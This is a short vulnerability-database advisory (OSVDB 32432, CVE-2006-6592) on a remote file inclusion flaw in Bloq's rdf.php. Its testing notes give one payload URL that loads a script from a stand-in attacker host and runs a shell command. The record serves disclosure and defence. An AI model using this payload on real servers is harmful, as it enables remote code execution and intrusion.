Bloq rdf.php page[path] Variable Remote File Inclusion

2006-10-12T09:57:07
ID OSVDB:32432
Type osvdb
Reporter OSVDB
Modified 2006-10-12T09:57:07

Description

Manual Testing Notes

http://[target]/[path]/rdf.php?page[path]=http://[attacker]/cmd.gif?&cmd=ls

References:

Related OSVDB ID: 32428 Related OSVDB ID: 32429 Related OSVDB ID: 32431 Related OSVDB ID: 32433 Related OSVDB ID: 32430 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0204.html ISS X-Force ID: 29585 CVE-2006-6592 Bugtraq ID: 20512